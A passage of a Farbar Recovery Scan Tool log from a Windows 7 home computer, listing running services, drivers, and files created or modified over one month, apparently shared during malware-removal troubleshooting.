R2 Intel(R) ME Service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe [128280 2012-03-28] ()
R2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [165144 2012-03-28] (Intel Corporation)
R2 MsMpSvc; c:\Program Files\Microsoft Security Client\MsMpEng.exe [23784 2014-08-22] (Microsoft Corporation)
R3 NisSrv; c:\Program Files\Microsoft Security Client\NisSrv.exe [368624 2014-08-22] (Microsoft Corporation)
R2 nlsX86cc; C:\Windows\SysWOW64\nlssrv32.exe [66560 2012-11-12] (Nalpeiron Ltd.) [File not signed]
==================== Drivers (Whitelisted) ====================
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
R3 CirrusLFD; C:\Windows\System32\DRIVERS\CSLFDx64.sys [35840 2012-04-02] (Cirrus Logic)
S3 ESETOlmarikOlmascoCleaner; C:\Windows\system32\Drivers\ESETOlmarikOlmascoCleaner.sys [156360 2014-04-11] ()
S3 libusb0; C:\Windows\System32\DRIVERS\libusb0.sys [44480 2011-05-17] (http://libusb-win32.sourceforge.net)
R0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [269008 2014-07-17] (Microsoft Corporation)
R2 NisDrv; C:\Windows\System32\DRIVERS\NisDrvWFP.sys [125584 2014-07-17] (Microsoft Corporation)
R3 ViWDM; C:\Windows\System32\DRIVERS\ViWDM.SYS [14336 2012-03-07] (Primax Electronics Ltd.)
R3 vrvd5; C:\Windows\System32\DRIVERS\vrvd5.sys [13344 2014-04-15] (Rsupport Corporation)
==================== NetSvcs (Whitelisted) ===================
(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)
==================== One Month Created Files and Folders ========
(If an entry is included in the fixlist, the file\folder will be moved.)
2014-11-02 22:23 - 2014-11-02 22:23 - 00013813 _____ () C:\Users\Ryan\Desktop\FRST.txt
2014-11-02 22:18 - 2014-11-02 22:23 - 00000000 ____D () C:\FRST
2014-11-02 22:17 - 2014-11-02 22:18 - 02114560 _____ (Farbar) C:\Users\Ryan\Desktop\FRST64.exe
2014-11-02 21:34 - 2014-11-02 21:34 - 00000000 ___RD () C:\Users\Ryan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\BT Devices
2014-11-01 22:30 - 2014-11-01 22:31 - 00001058 _____ () C:\DelFix.txt
2014-10-31 20:42 - 2014-10-31 20:42 - 00000000 ____D () C:\Program Files (x86)\ESET
2014-10-30 20:53 - 2014-11-01 22:30 - 00000000 ____D () C:\Windows\ERUNT
2014-10-30 00:30 - 2014-10-30 00:30 - 00000207 _____ () C:\Windows\tweaking.com-regbackup-RYAN-PC-Microsoft-Windows-7-Home-Premium-(64-bit).dat
2014-10-30 00:28 - 2014-10-30 00:28 - 00000000 ____D () C:\RegBackup
2014-10-30 00:27 - 2014-10-30 00:27 - 00002246 _____ () C:\Users\Public\Desktop\Tweaking.com - Registry Backup.lnk
2014-10-30 00:27 - 2014-10-30 00:27 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Tweaking.com
2014-10-30 00:27 - 2014-10-30 00:27 - 00000000 ____D () C:\Program Files (x86)\Tweaking.com
2014-10-29 18:45 - 2014-10-29 18:45 - 00000000 ____D () C:\Users\Ryan\AppData\Roaming\Mozilla
2014-10-15 15:38 - 2014-10-15 15:38 - 00272808 _____ (Oracle Corporation) C:\Windows\SysWOW64\javaws.exe
2014-10-15 15:38 - 2014-10-15 15:38 - 00175528 _____ (Oracle Corporation) C:\Windows\SysWOW64\javaw.exe
2014-10-15 15:38 - 2014-10-15 15:38 - 00175528 _____ (Oracle Corporation) C:\Windows\SysWOW64\java.exe
2014-10-15 15:38 - 2014-10-15 15:38 - 00098216 _____ (Oracle Corporation) C:\Windows\SysWOW64\WindowsAccessBridge-32.dll
2014-10-15 15:38 - 2014-10-15 15:38 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2014-10-15 15:38 - 2014-10-15 15:38 - 00000000 ____D () C:\Program Files (x86)\Java
2014-10-14 19:39 - 2014-10-20 21:01 - 00000000 ____D () C:\Users\Ryan\Desktop\masque of red death
2014-10-14 15:21 - 2014-09-28 19:58 - 03198976 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2014-10-14 15:21 - 2014-07-06 21:07 - 14632960 _____ (Microsoft Corporation) C:\Windows\system32\wmp.dll
2014-10-14 15:21 - 2014-07-06 21:07 - 00782848 _____ (Microsoft Corporation) C:\Windows\system32\wmdrmsdk.dll
2014-10-14 15:21 - 2014-07-06 21:06 - 05552056 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2014-10-14 15:21 - 2014-07-06 21:06 - 04120576 _____ (Microsoft Corporation) C:\Windows\system32\mf.dll
2014-10-14 15:21 - 2014-07-06 21:06 - 01202176 _____ (Microsoft Corporation) C:\Windows\system32\drmv2clt.dll
2014-10-14 15:21 - 2014-07-06 21:06 - 00842240 _____ (Microsoft Corporation) C:\Windows\system32\blackbox.dll
2014-10-14 15:21 - 2014-07-06 21:06 - 00500224 _____ (Microsoft Corporation) C:\Windows\system32\AUDIOKSE.dll
2014-10-14 15:21 - 2014-07-06 20:41 - 03975096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntkrnlpa.exe
2014-10-14 15:21 - 2014-07-06 20:41 - 03919288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntoskrnl.exe
2014-10-14 15:21 - 2014-07-06 20:40 - 00988160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\drmv2clt.dll
2014-10-14 15:21 - 2014-07-06 20:40 - 00744960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\blackbox.dll
2014-10-14 15:21 - 2014-07-06 20:40 - 00617984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmdrmsdk.dll
2014-10-14 15:21 - 2014-06-18 17:23 - 01943696 _____ (Microsoft Corporation) C:\Windows\system32\dfshim.dll
2014-10-14 15:21 - 2014-06-18 17:23 - 01131664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dfshim.dll
2014-10-14 15:21 - 2014-06-18 17:23 - 00156824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscorier.dll
2014-10-14 15:21 - 2014-06-18 17:23 - 00156312 _____ (Microsoft Corporation) C:\Windows\system32\mscorier.dll
2014-10-14 15:21 - 2014-06-18 17:23 - 00081560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscories.dll
2014-10-14 15:21 - 2014-06-18 17:23 - 00073880 _____ (Microsoft Corporation) C:\Windows\system32\mscories.dll
2014-10-14 15:20 - 2014-10-09 21:05 - 00507392 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll
2014-10-14 15:20 - 2014-10-09 21:05 - 00276480 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2014-10-14 15:20 - 2014-10-09 21:00 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2014-10-14 15:20 - 2014-10-06 21:54 - 00378552 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2014-10-14 15:20 - 2014-10-06 21:04 - 00331448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2014-10-14 15:20 - 2014-09-25 17:46 - 00365056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2014-10-14 15:20 - 2014-09-25 17:46 - 00243200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2014-10-14 15:20 - 2014-09-25 17:46 - 00069632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2014-10-14 15:20 - 2014-09-25 17:43 - 11807232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2014-10-14 15:20 - 2014-09-25 17:32 - 02017280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2014-10-14 15:20 - 2014-09-25 17:31 - 02108416 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2014-10-14 15:20 - 2014-09-18 20:56 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-10-14 15:20 - 2014-09-18 20:55 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2014-10-14 15:20 - 2014-09-18 20:44 - 17484800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2014-10-14 15:20 - 2014-09-18 20:41 - 02796032 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2014-10-14 15:20 - 2014-09-18 20:40 - 00066048 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2014-10-14 15:20 - 2014-09-18 20:39 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2014-10-14 15:20 - 2014-09-18 20:30 - 00033792 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2014-10-14 15:20 - 2014-09-18 20:25 - 00111616 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2014-10-14 15:20 - 2014-09-18 20:14 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2014-10-14 15:20 - 2014-09-18 20:14 - 00446464 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2014-10-14 15:20 - 2014-09-18 20:06 - 00072704 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2014-10-14 15:20 - 2014-09-18 20:01 - 00061952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll
2014-10-14 15:20 - 2014-09-18 20:01 - 00051200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll
2014-10-14 15:20 - 2014-09-18 19:55 - 02187264 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2014-10-14 15:20 - 2014-09-18 19:54 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2014-10-14 15:20 - 2014-09-18 19:53 - 00032768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll
2014-10-14 15:20 - 2014-09-18 19:51 - 00440320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2014-10-14 15:20 - 2014-09-18 19:49 - 00597504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll
2014-10-14 15:20 - 2014-09-18 19:42 - 00731136 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2014-10-14 15:20 - 2014-09-18 19:42 - 00710656 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2014-10-14 15:20 - 2014-09-18 19:36 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll
2014-10-14 15:20 - 2014-09-18 19:20 - 00607744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2014-10-14 15:20 - 2014-09-18 19:18 - 01068032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll
2014-10-14 15:20 - 2014-09-18 19:14 - 01447936 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2014-10-14 15:20 - 2014-09-18 18:53 - 01190400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2014-10-14 15:20 - 2014-08-18 22:08 - 00693176 _____ (Microsoft Corporation) C:\Windows\system32\winload.efi
2014-10-14 15:20 - 2014-08-18 22:08 - 00617376 _____ (Microsoft Corporation) C:\Windows\system32\winresume.efi
2014-10-14 15:20 - 2014-08-18 22:05 - 00503808 _____ (Microsoft Corporation) C:\Windows\system32\srcore.dll
2014-10-14 15:20 - 2014-08-18 22:05 - 00063488 _____ (Microsoft Corporation) C:\Windows\system32\setbcdlocale.dll
2014-10-14 15:20 - 2014-07-06 21:07 - 00229376 _____ (Microsoft Corporation) C:\Windows\system32\wintrust.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 01574400 _____ (Microsoft Corporation) C:\Windows\system32\quartz.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 01480192 _____ (Microsoft Corporation) C:\Windows\system32\crypt32.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 01069056 _____ (Microsoft Corporation) C:\Windows\system32\cryptui.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 00679424 _____ (Microsoft Corporation) C:\Windows\system32\audiosrv.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 00641024 _____ (Microsoft Corporation) C:\Windows\system32\msscp.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 00631808 _____ (Microsoft Corporation) C:\Windows\system32\evr.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 00497664 _____ (Microsoft Corporation) C:\Windows\system32\drmmgrtn.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 00440832 _____ (Microsoft Corporation) C:\Windows\system32\AudioEng.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 00432128 _____ (Microsoft Corporation) C:\Windows\system32\mfplat.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 00325632 _____ (Microsoft Corporation) C:\Windows\system32\msnetobj.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 00296448 _____ (Microsoft Corporation) C:\Windows\system32\AudioSes.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 00284672 _____ (Microsoft Corporation) C:\Windows\system32\EncDump.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 00206848 _____ (Microsoft Corporation) C:\Windows\system32\mfps.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 00188416 _____ (Microsoft Corporation) C:\Windows\system32\pcasvc.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 00187904 _____ (Microsoft Corporation) C:\Windows\system32\cryptsvc.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 00082432 _____ (Microsoft Corporation) C:\Windows\system32\cryptsp.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 00058880 _____ (Microsoft Corporation) C:\Windows\system32\appidapi.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 00055808 _____ (Microsoft Corporation) C:\Windows\system32\rrinstaller.exe
2014-10-14 15:20 - 2014-07-06 21:06 - 00034304 _____ (Microsoft Corporation) C:\Windows\system32\appidsvc.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 00024576 _____ (Microsoft Corporation) C:\Windows\system32\mfpmp.exe
2014-10-14 15:20 - 2014-07-06 21:06 - 00009728 _____ (Microsoft Corporation) C:\Windows\system32\spwmp.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 00005120 _____ (Microsoft Corporation) C:\Windows\system32\msdxm.ocx
2014-10-14 15:20 - 2014-07-06 21:06 - 00005120 _____ (Microsoft Corporation) C:\Windows\system32\dxmasf.dll
2014-10-14 15:20 - 2014-07-06 21:05 - 12625920 _____ (Microsoft Corporation) C:\Windows\system32\wmploc.DLL
2014-10-14 15:20 - 2014-07-06 21:05 - 00126464 _____ (Microsoft Corporation) C:\Windows\system32\audiodg.exe
2014-10-14 15:20 - 2014-07-06 21:02 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\mferror.dll
2014-10-14 15:20 - 2014-07-06 20:52 - 00663552 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\PEAuth.sys
2014-10-14 15:20 - 2014-07-06 20:40 - 11411456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmp.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 03208704 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mf.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 01329664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\quartz.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 01174528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\crypt32.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 01005056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptui.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 00504320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msscp.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 00489984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\evr.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 00442880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AUDIOKSE.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 00406016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\drmmgrtn.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 00374784 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AudioEng.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 00354816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfplat.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 00265216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msnetobj.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 00195584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AudioSes.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 00179200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wintrust.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 00143872 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptsvc.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 00103424 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfps.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 00081408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptsp.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 00050688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\appidapi.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 00008192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\spwmp.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 00004096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msdxm.ocx
2014-10-14 15:20 - 2014-07-06 20:40 - 00004096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxmasf.dll
2014-10-14 15:20 - 2014-07-06 20:39 - 12625408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmploc.DLL
2014-10-14 15:20 - 2014-07-06 20:39 - 00050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rrinstaller.exe
2014-10-14 15:20 - 2014-07-06 20:39 - 00023040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfpmp.exe
2014-10-14 15:20 - 2014-07-06 20:37 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mferror.dll
2014-10-14 15:20 - 2014-07-06 20:04 - 00062464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\appid.sys
2014-10-14 15:20 - 2014-06-27 19:21 - 00619056 _____ (Microsoft Corporation) C:\Windows\system32\winload.exe
2014-10-14 15:20 - 2014-06-27 19:21 - 00533200 _____ (Microsoft Corporation) C:\Windows\system32\winresume.exe
2014-10-14 15:20 - 2014-06-27 19:21 - 00457400 _____ (Microsoft Corporation) C:\Windows\system32\ci.dll
2014-10-14 15:19 - 2014-09-25 17:50 - 13619200 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2014-10-14 15:19 - 2014-09-18 21:25 - 23631360 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-10-14 15:19 - 2014-09-18 20:40 - 00547328 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2014-10-14 15:19 - 2014-09-18 20:38 - 00083968 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2014-10-14 15:19 - 2014-09-18 20:36 - 05829632 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2014-10-14 15:19 - 2014-09-18 20:31 - 00051200 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2014-10-14 15:19 - 2014-09-18 20:27 - 00595968 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2014-10-14 15:19 - 2014-09-18 20:26 - 00139264 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2014-10-14 15:19 - 2014-09-18 20:25 - 04201472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2014-10-14 15:19 - 2014-09-18 20:25 - 00758272 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2014-10-14 15:19 - 2014-09-18 20:18 - 00940032 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2014-10-14 15:19 - 2014-09-18 20:02 - 00454656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2014-10-14 15:19 - 2014-09-18 20:01 - 00195584 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2014-10-14 15:19 - 2014-09-18 20:00 - 00085504 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2014-10-14 15:19 - 2014-09-18 19:59 - 00061952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll
2014-10-14 15:19 - 2014-09-18 19:58 - 00289280 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2014-10-14 15:19 - 2014-09-18 19:50 - 00112128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe
2014-10-14 15:19 - 2014-09-18 19:40 - 01249280 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2014-10-14 15:19 - 2014-09-18 19:33 - 02309632 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2014-10-14 15:19 - 2014-09-18 19:32 - 00164864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll
2014-10-14 15:19 - 2014-09-18 18:59 - 01810944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2014-10-14 15:19 - 2014-09-18 18:59 - 00775168 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2014-10-14 15:19 - 2014-09-18 18:52 - 00678400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2014-10-14 15:18 - 2014-09-17 21:00 - 03241472 _____ (Microsoft Corporation) C:\Windows\system32\msi.dll
2014-10-14 15:18 - 2014-09-17 20:32 - 02363904 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msi.dll
2014-10-14 15:17 - 2014-09-12 20:58 - 00077312 _____ (Microsoft Corporation) C:\Windows\system32\packager.dll
2014-10-14 15:17 - 2014-09-12 20:40 - 00067072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\packager.dll
2014-10-14 15:17 - 2014-09-04 00:23 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\rastls.dll
2014-10-14 15:17 - 2014-09-04 00:04 - 00372736 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rastls.dll
2014-10-14 15:17 - 2014-07-16 21:07 - 03722240 _____ (Microsoft Corporation) C:\Windows\system32\mstscax.dll
2014-10-14 15:17 - 2014-07-16 21:07 - 01118720 _____ (Microsoft Corporation) C:\Windows\system32\mstsc.exe
2014-10-14 15:17 - 2014-07-16 21:07 - 00681984 _____ (Microsoft Corporation) C:\Windows\system32\termsrv.dll
2014-10-14 15:17 - 2014-07-16 21:07 - 00455168 _____ (Microsoft Corporation) C:\Windows\system32\winlogon.exe
2014-10-14 15:17 - 2014-07-16 21:07 - 00235520 _____ (Microsoft Corporation) C:\Windows\system32\winsta.dll
2014-10-14 15:17 - 2014-07-16 21:07 - 00150528 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorekmts.dll
2014-10-14 15:17 - 2014-07-16 21:07 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2014-10-14 15:17 - 2014-07-16 21:07 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2014-10-14 15:17 - 2014-07-16 20:40 - 00157696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\winsta.dll
2014-10-14 15:17 - 2014-07-16 20:39 - 03221504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstscax.dll
2014-10-14 15:17 - 2014-07-16 20:39 - 01051136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstsc.exe
2014-10-14 15:17 - 2014-07-16 20:39 - 00131584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\aaclient.dll
2014-10-14 15:17 - 2014-07-16 20:39 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll
2014-10-14 15:17 - 2014-07-16 20:39 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll
2014-10-14 15:17 - 2014-07-16 20:21 - 00212480 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rdpwd.sys
2014-10-14 15:17 - 2014-07-16 20:21 - 00039936 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tssecsrv.sys
2014-10-07 16:52 - 2014-10-07 16:52 - 00013762 _____ () C:\Users\Ryan\Desktop\contacts.vcf
2014-10-03 22:37 - 2014-10-03 22:37 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype
==================== One Month Modified Files and Folders =======
(If an entry is included in the fixlist, the file\folder will be moved.)
2014-11-02 21:39 - 2012-01-02 04:18 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-11-02 21:36 - 2013-10-27 14:17 - 00000904 _____ () C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1987813687-3303645166-2786259458-1001UA.job
2014-11-02 21:34 - 2012-08-05 23:52 - 00000000 ____D () C:\Users\Ryan\Documents\Bluetooth Folder
2014-11-02 21:34 - 2012-06-09 02:40 - 01270449 _____ () C:\Windows\WindowsUpdate.log
2014-11-02 17:36 - 2013-10-27 14:17 - 00000852 _____ () C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1987813687-3303645166-2786259458-1001Core.job
2014-11-02 15:15 - 2009-07-14 00:13 - 00006214 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-11-01 22:43 - 2009-07-13 23:45 - 00027744 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-11-01 22:43 - 2009-07-13 23:45 - 00027744 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-11-01 22:36 - 2009-07-14 00:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-11-01 22:35 - 2012-05-04 13:49 - 00073106 _____ () C:\Windows\setupact.log
2014-11-01 17:05 - 2012-08-10 11:38 - 00000000 ____D () C:\Users\Ryan\AppData\Local\CrashDumps
2014-11-01 17:00 - 2013-10-16 05:44 - 00000000 ____D () C:\Users\Ryan\Documents\Postcolonial Medicine
2014-10-31 14:58 - 2014-04-12 01:42 - 00129752 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-10-30 20:49 - 2012-05-18 18:17 - 00263724 _____ () C:\Windows\PFRO.log
2014-10-30 20:43 - 2013-01-18 22:39 - 00708608 ___SH () C:\Users\Ryan\Desktop\Thumbs.db
2014-10-30 06:25 - 2010-11-20 22:27 - 00275080 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
2014-10-29 15:49 - 2014-04-12 01:42 - 00001113 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-10-29 15:49 - 2014-04-12 01:42 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-10-29 15:49 - 2014-04-12 01:42 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-10-22 16:31 - 2013-10-27 14:17 - 00003872 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1987813687-3303645166-2786259458-1001UA
2014-10-22 16:31 - 2013-10-27 14:17 - 00003476 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1987813687-3303645166-2786259458-1001Core
2014-10-21 10:22 - 2012-08-28 22:49 - 00000000 ____D () C:\Users\Ryan\AppData\Local\Microsoft Help
2014-10-15 18:46 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\rescache
2014-10-15 15:38 - 2013-10-25 17:22 - 00000000 ____D () C:\ProgramData\Oracle
2014-10-15 15:29 - 2009-07-14 00:09 - 00000000 ____D () C:\Windows\System32\Tasks\WPD
2014-10-15 15:27 - 2009-07-13 23:45 - 00342240 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-10-15 15:25 - 2014-05-06 23:19 - 00000000 ___SD () C:\Windows\system32\CompatTel
2014-10-15 15:25 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\SysWOW64\Dism
2014-10-15 15:25 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\system32\Dism
2014-10-15 02:01 - 2012-08-28 22:49 - 00000000 ____D () C:\ProgramData\Microsoft Help
2014-10-15 01:57 - 2014-05-09 16:11 - 00000000 ____D () C:\Windows\system32\MRT
2014-10-15 01:54 - 2014-05-09 16:11 - 103265616 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe
2014-10-13 16:36 - 2012-09-17 11:31 - 00000000 ____D () C:\Users\Ryan\Documents\Personal Statement Docs
2014-10-13 15:01 - 2013-02-09 15:54 - 00000000 ____D () C:\Users\Ryan\Documents\Poems
2014-10-12 22:37 - 2012-08-05 23:51 - 00000000 ____D () C:\Users\Ryan\AppData\Roaming\Skype
2014-10-03 22:37 - 2014-03-06 03:01 - 00000000 ___RD () C:\Program Files (x86)\Skype
2014-10-03 22:37 - 2012-01-02 03:58 - 00000000 ____D () C:\ProgramData\Skype
Some content of TEMP:
====================
